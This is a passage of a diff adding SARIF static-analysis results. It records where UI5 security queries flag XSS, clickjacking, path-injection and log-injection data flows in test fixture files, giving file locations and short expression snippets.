{ + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + 
"text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 9, + "startColumn" : 9, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6152b8f74a1abdf5:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 28, + "startColumn" : 34, + "endColumn" : 66 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b01bd23ca3666824:1", + "primaryLocationStartColumnFingerprint" : "25" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7fe81114896a63c:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "df700c15dad274b2:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "68e5ff83e2198ff5:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + 
"region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b79de9dff4d8f842:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 228 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + 
}, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "de27f6d546a116e8:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "62d5a4db56a18502:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... 
param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "751ece7cb6fd18f7:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" } - }, - "note": { - "+": 0, - "-": 0, - "codes": {} + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "191c273ff0751536:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a 
